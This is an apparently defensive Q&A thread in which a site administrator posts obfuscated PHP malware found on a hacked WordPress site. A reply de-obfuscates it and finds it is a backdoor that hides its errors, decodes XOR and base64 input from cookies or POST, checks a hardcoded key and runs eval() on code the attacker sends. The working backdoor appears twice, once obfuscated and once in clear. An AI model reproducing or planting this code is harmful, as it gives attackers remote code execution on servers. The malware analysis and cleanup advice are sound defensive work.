One of my clients using WordPress got hacked with some malicious code like below, There are lots of file like this in all over her public_html. Though I told her to delete everything and re-upload all and update framework, plugins etc but I also want to know how can I de-obfuscate the codes
Why? Because my VPS provider told me that some hacking attempt was done using my IP (main server) to some news channel and I should stop from this kind of activities or they will simply discontinue my VPS.
So could anyone guide me to know exact code so I can analyze what kind of harms it may done.
Please note I've done jail-shell, CSF, blocking IP still it finds some way.
<?php
$GLOBALS['efaa04'] = "\x3e\x9\x2c\x46\x67\x37\x52\x32\x7d\x53\x6c\x7b\x61\x29\x6e\x68\x4f\x3f\x40\x50\x3d\x71\x6a\x54\x30\x76\x59\x25\x2b\x73\x2d\x28\x7c\x66\x23\x65\x5d\x58\x5a\x22\x64\x33\x57\x69\x5b\x63\x26\x4b\x51\x78\x4e\x2e\x62\x35\x7e\x5c\x42\x45\x47\x31\x36\x2a\x3a\x4a\x6f\x77\x5f\x39\x21\xa\x2f\x75\x41\x79\x4d\x55\x5e\x7a\x34\x44\x48\xd\x3c\x20\x49\x60\x74\x24\x4c\x43\x27\x6d\x56\x72\x70\x6b\x38\x3b";
$GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][12]] = $GLOBALS['efaa04'][45].$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][93];
$GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][24]] = $GLOBALS['efaa04'][64].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][40];
$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]] = $GLOBALS['efaa04'][29].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][14];
$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]] = $GLOBALS['efaa04'][43].$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][86];
$GLOBALS[$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][67]] = $GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][77].$GLOBALS['efaa04'][35];
$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][60]] = $GLOBALS['efaa04'][94].$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][94].$GLOBALS['efaa04'][25].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][14];
$GLOBALS[$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][96]] = $GLOBALS['efaa04'][71].$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][77].$GLOBALS['efaa04'][35];
$GLOBALS[$GLOBALS['efaa04'][22].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][40]] = $GLOBALS['efaa04'][52].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][35];
$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][35]] = $GLOBALS['efaa04'][29].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][86];
$GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][60]] = $GLOBALS['efaa04'][21].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][59];
$GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][45]] = $GLOBALS['efaa04'][14].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59];
$GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][33]] = $_POST;
$GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][33]] = $_COOKIE;
@$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]]($GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][10].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][4], NULL);
@$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]]($GLOBALS['efaa04'][10].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][4].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][29], 0);
@$GLOBALS[$GLOBALS['efaa04'][93].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53]]($GLOBALS['efaa04'][91].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][64].$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][66].$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][43].$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][35], 0);
@$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][35]](0);
$n1f035 = NULL;
$la02268b = NULL;
$GLOBALS[$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][59]] = $GLOBALS['efaa04'][78].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][33];
global $ea0d31;
function n6ee1($n1f035, $f3ddc0)
{
$kdaf = "";
for ($v40207=0; $v40207<$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]]($n1f035);)
{
for ($w6efcf7b=0; $w6efcf7b<$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]]($f3ddc0) && $v40207<$GLOBALS[$GLOBALS['efaa04'][49].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][45].$GLOBALS['efaa04'][96]]($n1f035); $w6efcf7b++, $v40207++)
{
$kdaf .= $GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][12]]($GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][24]]($n1f035[$v40207]) ^ $GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][24]]($f3ddc0[$w6efcf7b]));
}
}
return $kdaf;
}
function q471($n1f035, $f3ddc0)
{
global $ea0d31;
return $GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][45]]($GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][45]]($n1f035, $ea0d31), $f3ddc0);
}
foreach ($GLOBALS[$GLOBALS['efaa04'][91].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][33]] as $f3ddc0=>$tf250bbad)
{
$n1f035 = $tf250bbad;
$la02268b = $f3ddc0;
}
if (!$n1f035)
{
foreach ($GLOBALS[$GLOBALS['efaa04'][71].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][33]] as $f3ddc0=>$tf250bbad)
{
$n1f035 = $tf250bbad;
$la02268b = $f3ddc0;
}
}
$n1f035 = @$GLOBALS[$GLOBALS['efaa04'][15].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][33].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][5].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][96]]($GLOBALS[$GLOBALS['efaa04'][86].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][67].$GLOBALS['efaa04'][41].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][60]]($GLOBALS[$GLOBALS['efaa04'][22].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][59].$GLOBALS['efaa04'][40]]($n1f035), $la02268b));
if (isset($n1f035[$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][95]]) && $ea0d31==$n1f035[$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][95]])
{
if ($n1f035[$GLOBALS['efaa04'][12]] == $GLOBALS['efaa04'][43])
{
$v40207 = Array(
$GLOBALS['efaa04'][94].$GLOBALS['efaa04'][25] => @$GLOBALS[$GLOBALS['efaa04'][73].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][78].$GLOBALS['efaa04'][96].$GLOBALS['efaa04'][40].$GLOBALS['efaa04'][60]](),
$GLOBALS['efaa04'][29].$GLOBALS['efaa04'][25] => $GLOBALS['efaa04'][59].$GLOBALS['efaa04'][51].$GLOBALS['efaa04'][24].$GLOBALS['efaa04'][30].$GLOBALS['efaa04'][59],
);
echo @$GLOBALS[$GLOBALS['efaa04'][14].$GLOBALS['efaa04'][35].$GLOBALS['efaa04'][60].$GLOBALS['efaa04'][7].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][53].$GLOBALS['efaa04'][12].$GLOBALS['efaa04'][52].$GLOBALS['efaa04'][67]]($v40207);
}
elseif ($n1f035[$GLOBALS['efaa04'][12]] == $GLOBALS['efaa04'][35])
{
eval($n1f035[$GLOBALS['efaa04'][40]]);
}
exit();
}
Tried to decode it with http://localhost/script.php?testGet=sss and got result
Array
(
[_GET] => Array
(
[testGet] => sss
)
[_POST] => Array
(
)
[_COOKIE] => Array
(
)
[_FILES] => Array
(
)
[GLOBALS] => Array
*RECURSION*
[efaa04] => > ,Fg7R2}Sl{a)nhO?@P=qjT0vY%+s-(|f#e]XZ"d3Wi[c&KQxN.b5~\BEG16*:Jow_9!
/uAyMU^z4DH
< I`t$LC'mVrpk8;
[m56df3a] => chr
[ue8410] => ord
[x6a870c8] => strlen
[rfa65] => ini_set
[ne6255ab9] => serialize
[y648d6] => phpversion
[h8f865758] => unserialize
[j51e1d] => base64_decode
[y8512e] => set_time_limit
[t4193646] => q471
[t297c] => n6ee1
[uaf6e192f] => Array
(
)
[mb1694f] => Array
(
)
[n1f035] =>
[la02268b] =>
[ea0d31] => 435a677a-8b6e-4dc3-92e9-b2746832025f
)
got here
got not set n1f035
got q471string(0) ""
got n6ee1 : => 435a677a-8b6e-4dc3-92e9-b2746832025f
strlen
NULL string(0) ""
got n6ee1 : =>
strlen
NULL string(0) "" string(0) ""
got n6ee1 : => 435a677a-8b6e-4dc3-92e9-b2746832025f
strlen
NULL string(0) ""
got n6ee1 : =>
strlen
NULL bool(false)
I've told my client them to delete all files and re-upload from the backup. As I said I've found so many C99madshell (raw), is this kind of same in obfuscating manner.
Please note I've found a way to protect by searching malicious code and deleting them. Then run a command like chattr -R +i ./public_html then it seems stopped though i'm sure there are many backdoor scripts still inside. but if I would know exact code of above would be better.
I agree with @Epodax, SO is not a security consultancy site, but I think the discussion around de-obfuscation is worthy and many people could learn a lot -from it.
I still couldn't figure out what the script does, slowly working on it as I find spare time, but want to share my progress so far anyways.
First I used Psysh, an interactive PHP shell, to retrieve all those concatenations of $GLOBALS['efaa04'] elements and make life easier. Just run the first line $GLOBALS['efaa04'] = "\x3e\x9\x2c\x46\x67\x37\x52\x32\x7d\x53\x6c\x7b\x61\x29\x6e\x68\x4f\x3f\x40\x50\x3d\x71\x6a\x54\x30\x76\x59\x25\x2b\x73\x2d\x28\x7c\x66\x23\x65\x5d\x58\x5a\x22\x64\x33\x57\x69\x5b\x63\x26\x4b\x51\x78\x4e\x2e\x62\x35\x7e\x5c\x42\x45\x47\x31\x36\x2a\x3a\x4a\x6f\x77\x5f\x39\x21\xa\x2f\x75\x41\x79\x4d\x55\x5e\x7a\x34\x44\x48\xd\x3c\x20\x49\x60\x74\x24\x4c\x43\x27\x6d\x56\x72\x70\x6b\x38\x3b"; and then go echoing the parts that use this array elements to figure out what they mean.
Some lines like this revealed:
$GLOBALS["x6a870c8"] = "strlen";
$GLOBALS["rfa65"] = "ini_set";
$GLOBALS["ne6255ab9"] = "serialize";
$GLOBALS["y648d6"] = "phpversion";
$GLOBALS["h8f865758"] = "unserialize";
...
After that I replaced $GLOBALS["x6a870c8"] with strlen, $GLOBALS["rfa65"] with ini_set and so on, and this is what I got so far:
<?php
@ini_set("error_log", NULL);
@ini_set("log_errors", 0);
@ini_set("max_execution_time", 0);
@set_time_limit(0);
$n1f035 = NULL;
$la02268b = NULL;
$GLOBALS["ea0d31"] = "435a677a-8b6e-4dc3-92e9-b2746832025f";
global $ea0d31;
function n6ee1($n1f035, $f3ddc0)
{
$kdaf = "";
for ($v40207=0; $v40207 < strlen($n1f035);)
{
for ($w6efcf7b=0; $w6efcf7b < strlen($f3ddc0) && $v40207 < strlen($n1f035); $w6efcf7b++, $v40207++)
{
$kdaf .= chr(ord($n1f035[$v40207]) ^ ord($f3ddc0[$w6efcf7b]));
}
}
return $kdaf;
}
function q471($n1f035, $f3ddc0)
{
global $ea0d31;
return n6ee1(n6ee1($n1f035, $ea0d31), $f3ddc0);
}
foreach ($_COOKIE as $f3ddc0=>$tf250bbad)
{
$n1f035 = $tf250bbad;
$la02268b = $f3ddc0;
}
if (!$n1f035)
{
foreach ($_POST as $f3ddc0=>$tf250bbad)
{
$n1f035 = $tf250bbad;
$la02268b = $f3ddc0;
}
}
$n1f035 = @unserialize(q471(base64_decode($n1f035), $la02268b));
if (isset($n1f035["ak"]) && $ea0d31==$n1f035["ak"])
{
if ($n1f035["a"] == "i")
{
$v40207 = Array(
"pv" => @phpversion(),
"sv" => "1.0-1",
);
echo @serialize($v40207);
}
elseif ($n1f035["a"] == "e")
{
eval($n1f035["d"]);
}
exit();
}
De-obfuscation can be tough or fun, it depends on your point of view. Think of it like a puzzle. Next steps are to tidy this up, rename vars and functions to more friendly stuff, and so on.
Fixing you client's site and keeping it safe is your homework, but I look forward for a discussion around de-obfuscation and techniques to do so.
A tip: Use find . -type f -printf '%T@ %TY-%Tm-%Td %TH:%TM:%.2TS %p\n' | sort -nr | head -n 25 | cut -f2- -d" " to list the 25 latest changed files on your server. You can increase the number if you like. I guess the infected files changed in the same day, or close dates at least, so that help to clean up the mess if you can't just wipe things clean at the moment.